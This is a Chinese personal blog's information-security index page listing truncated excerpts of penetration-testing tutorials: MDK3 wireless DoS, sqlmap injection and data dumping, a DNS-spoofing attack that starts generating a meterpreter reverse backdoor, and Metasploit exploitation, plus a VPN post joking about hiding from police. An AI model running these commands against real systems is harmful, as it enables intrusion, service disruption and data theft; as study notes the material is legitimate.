• 欢迎访问金笔头博客,本博客是一个关注网站建设、软件编程、商务智能、信息安全和Linux的独立博客,博文为个人学习笔记,记录学习历程,欢迎各位大牛指正。
  • Comments and suggestions from all readers are welcome. Email: jinbitou@126.com
  • 建议使用火狐和谷歌浏览器浏览本站.
  • 如果你喜欢本站,试试【Ctrl + D】 收藏吧!

信息安全

MDK3攻击模式详解

MDK3攻击模式详解
MDK3简介:MDK3 是一款集成在 BackTrack上的无线DOS攻击测试工具,能够发起Beacon Flood 、Authentication DoS、Deauthentication/Disassociation Amok等模式的攻击,另外它还具有针对隐藏 ESSID的暴力探测模式、802.1X 渗透测试、WIDS 干扰等功能,对于后面几种功能模……继续阅读 »

2年前 (2016-02-05) 2078浏览

Sql Injection and Dump The Data

Sql Injection and Dump The Data
1.检测注入点是否可用root@kali:~/Desktop# sqlmap -u http://www.xxoo.com/assist/index.php?id=20参数:-u:指定注入点url探测结果可知:(1)注入参数id为GET注入,注入类型为UNION query(2)web应用程序技术为PHP5.6.9(3)数据库类型为MyS……继续阅读 »

2年前 (2015-12-14) 1320浏览

sqlmap常用参数

sqlmap常用参数
#获取当前用户名称 sqlmap -u "http://url?id=1" --current-user #获取当前数据库名称sqlmap -u "http://url?id=1" --current-db #列出给定数据库的所有表sqlmap -u "http://url?id=1" -D "db_name" --tables #列出指定……继续阅读 »

2年前 (2015-12-13) 2380浏览

Kali Linux配置VPN(PPTP)

Kali Linux配置VPN(PPTP)
Kali Linux安装好之后默认是没有配置VPN连接的,有时候笔头君想干点儿坏事又不想暴露自己的位置以免被警察叔叔查水表,这时候配置VPN就显得很有必要了,好啦,下面开始配置过程。1.修改软件更新源root@kali:~#leafpad /etc/apt/sources.list2.将如下阿里云的Kali源粘贴进去,同时将官方源用#号注释掉d……继续阅读 »

2年前 (2015-11-14) 3300浏览

kali-Linux_DNS欺骗实现内网渗透

kali-Linux_DNS欺骗实现内网渗透
环境部署:kali-Linux + Windows XP SP3所需工具:Msf + ettercap + apache2目标主机:192.168.1.12攻击主机:192.168.1.71.首先用msfpayload 生成内个有效的WIN可执行后门root@kali:~# msfpayload windows/meterpreter/reve……继续阅读 »

2年前 (2015-09-05) 7074浏览

[BackTrack]漏洞利用之metasploit实战

[BackTrack]漏洞利用之metasploit实战
1.扫描局域网内存活主机,将扫描结果存入ip.txt中root@bt:~# nmap -sP 192.168.1.0/24 |grep ‘192.168.1.*’ >>/root/Desktop/ip.txtip.txt内容如下:整理一下格式:2.扫描存活主机的操作系统root@bt:~# nmap -O -……继续阅读 »

2年前 (2015-09-05) 9036浏览